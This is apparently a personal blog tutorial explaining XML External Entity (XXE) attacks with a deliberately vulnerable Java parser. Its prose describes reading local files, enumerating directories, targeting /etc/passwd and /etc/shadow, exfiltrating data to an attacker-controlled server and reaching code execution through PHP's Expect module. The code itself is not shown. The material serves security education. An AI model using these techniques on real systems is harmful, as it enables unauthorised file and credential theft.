XXE Attack Basics

March 14, 2017

The XML External Entity attack (also known as XXE) is a fairly common issue with XML parsers in web applications. Many languages, such as Java, are unprotected from this attack by default. For this article I’d like to explain the basics of how this attack works and how it can be exploited on a system.

How it works

XXE attacks rely on the “external general parsed entity” (or in short, external entity). Essentially, there is a feature in the XML standard that allows you to point to another location and say, “there is more XML information over there”. As this article says, external entities are useful for “creating a common reference that can be shared between multiple documents”.

The problem is that this nifty feature can serve as an attack vector under the right circumstances.

How to exploit

XXE vulnerabilities come in many different flavors. For some you can exploit by uploading an XML file to a website (Microsoft Word .docx files are XML...could you use that as an attack vector? Yes!). For others you can do it in a POST command. For the purposes of this article I will create a simple XML parser using Java and then create a custom XML file that will exploit the vulnerability.

To begin, we need an XML parser. I chose Java for the language because it is a common language used for web applications (and because I haven’t played with the language in a little while).


This is a standard XML parser (more specifically it’s a DOM parser). We are using the standard Java libraries to build the factory, instantiate an instance, then parse the file. After that we are printing out a value for something called the “rootNode” (name is arbitrary).

Our next goal will be to craft the XML file to perform the exploit. As you can see in the Java code, we are calling this file “test.xml”, although this name is arbitrary.


What looks like a normal XML file is so much more. We declare the file type on line 1. In line 2 we are declaring a document type called “vulnerableDocType” (again, the name is arbitrary). This is the section where we will make use of the external entity. In line 3 we create an entity called “vuln” which calls to the system and asks for a file. This file is arbitrary, you can ask for any file that the system has access to. After that, in line 5, we place the value (literally the contents of the earlier file) into a variable that the parser will read. If the developers aren’t careful and didn’t sanitize their outputs, then their application will display this information to you.

Now for a test run, lets see what the output is!

As we can see, this file appears to be a list of passwords for various services. Pretty cool right? Now, you may be wondering, “Nick, this doesn’t help me. How am I supposed to know what files are on the system?”. Well, my little peppermint, I have good news for you! You can do directory and file enumeration!

To do this, instead of looking for a particular file, leave it on a directory. If I were to change my previous example, it would instead be “file:///home/nick/workspace/XXE/”. Now lets see what happens.

Through this method you can search around for files you may want to look at, think etc/passwd or, if running as root, etc/shadow.

Continuing the attack

From here you have more options depending on the configuration (or misconfiguration) of the parser. There are ways to have the parser query over http, meaning if they don’t show the information to the user, you could have it query a web server you control! The problem you will run into is the new line character which typically ends an http packet, however there are some ways around this such as using a protocol like netdoc, gopher, or jar if the parser supports it.

If the application is written in PHP and has the Expect module loaded, you can even perform remote code execution! With the prevalence of XML parsers in modern web application the possibilities are endless.

For more information on how to harden your web app to this attack check out the OWASP page on it at this link.